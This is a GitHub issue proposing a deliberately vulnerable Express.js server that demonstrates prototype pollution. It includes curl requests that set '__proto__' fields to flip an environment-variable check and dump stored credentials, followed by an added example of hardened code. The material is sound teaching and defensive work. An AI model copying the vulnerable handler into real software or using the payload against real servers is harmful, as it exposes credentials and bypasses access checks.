Idea: Add small & simple exploitable server #1

Open
lxhom opened this issue Dec 13, 2021 · 0 comments

lxhom commented Dec 13, 2021

Hi! Just watched your video (great video by the way!), and I have a small suggestion: the exploit shown in the video is IMO a bit complicated, and it uses a 3rd-party library with the bug in it. So I wrote a small Express.js web server for Node that's vulnerable to the same concept, but simpler. This is the code:

```js
let app = require("express")() // Load & create an Express server
let userData = {} // User data storage object
let credentials = {email: "[email protected]", password: "abcd"}
app.get("/addUser", (req, res) => {
  let {region, name, uuid} = req.query // Store query parameters into variables
  if (userData[region] === undefined) { // If that region isn't initialized:
    userData[region] = {} // Make it an empty object
  }
  userData[region][name] = uuid // Store the UUID under the name in the region
  res.send("Success!\n") // And send a success message.
})
app.get("/debug/getCurrentCredentials", (req, res) => {
  if (process.env.TESTING === "true") { // If the testing env variable is set:
    res.send(JSON.stringify(credentials) + "\n") // Send the credentials
  } else { // Or:
    res.status(403).send("Not allowed!\n") // Send an error
  }
})
app.listen(1337) // And run the server
```

It has essentially the same vulnerability; we can exploit it by sending this request:

```shell
❯ node server.js &
❯ curl "localhost:1337/debug/getCurrentCredentials"
Not allowed!
❯ curl "localhost:1337/addUser?region=__proto__&name=TESTING&uuid=true"
Success!
❯ curl "localhost:1337/debug/getCurrentCredentials"
{"email":"[email protected]","password":"abcd"}
```

It's super simple: the server executes `userData["__proto__"]["TESTING"] = "true"` in line 9, so the server thinks the TESTING env variable is set to "true". And we don't even have to involve a fancy JSON parser or anything; the assignment alone is enough. Might be a nice little addition :)
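The bug in the issue above, isolated from Express so it runs offline, as an added example that is not lxhom's code: the same store-and-assign logic as the `/addUser` handler next to a hardened version (null-prototype store, reserved-key rejection, own-property checks). The `env` object is a constructed stand-in for `process.env`; the function names and the `demonstrate()` driver are this example's own.

```javascript
"use strict";

// Keys that reach into the prototype chain when used as property names.
const DANGEROUS_KEYS = new Set(["__proto__", "constructor", "prototype"]);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Vulnerable: mirrors the issue's handler. With region "__proto__",
// userData[region] is Object.prototype (not undefined), so the assignment
// below writes TESTING onto every plain object in the process.
function vulnerableAddUser(userData, region, name, uuid) {
  if (userData[region] === undefined) {
    userData[region] = {};
  }
  userData[region][name] = uuid;
}

// Hardened: reserved names are rejected, only own properties are consulted,
// and each region is a null-prototype object so "__proto__" is an ordinary key.
function safeAddUser(userData, region, name, uuid) {
  if (DANGEROUS_KEYS.has(region) || DANGEROUS_KEYS.has(name)) {
    throw new Error(`rejected reserved key: ${region}/${name}`);
  }
  if (!hasOwn(userData, region)) {
    userData[region] = Object.create(null);
  }
  userData[region][name] = uuid;
}

// The check the issue's /debug route performs, against a caller-supplied
// env object (constructed stand-in for process.env).
function isTestingEnabled(env) {
  return env.TESTING === "true";
}

// Same check, but only an own property counts, so pollution can't flip it.
function isTestingEnabledOwn(env) {
  return hasOwn(env, "TESTING") && env.TESTING === "true";
}

// Runs the attack against both stores and reports what each check sees.
function demonstrate() {
  const env = {}; // constructed: TESTING is not set
  const result = {};
  try {
    const store = {};
    vulnerableAddUser(store, "__proto__", "TESTING", "true");
    result.vulnerableFlipsCheck = isTestingEnabled(env); // true: polluted
    result.ownCheckResists = !isTestingEnabledOwn(env);  // true: not own prop
    result.pollutionIsGlobal = ({}).TESTING === "true";  // true: every object
  } finally {
    delete Object.prototype.TESTING; // undo the pollution
  }
  const safeStore = Object.create(null);
  safeAddUser(safeStore, "eu", "alice", "uuid-1");
  result.safeStoresNormal = safeStore.eu.alice === "uuid-1";
  let rejected = false;
  try {
    safeAddUser(safeStore, "__proto__", "TESTING", "true");
  } catch (e) {
    rejected = true;
  }
  result.safeRejectsProto = rejected;
  result.prototypeClean = ({}).TESTING === undefined;
  return result;
}

console.log(demonstrate());
```

The `finally` cleanup matters because Object.prototype pollution is process-wide: in the real server it persists until restart, which is why the first `curl` after `/addUser` succeeds. A `Map` keyed by region, or a JSON schema that rejects `__proto__` before the handler runs, are equivalent mitigations.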
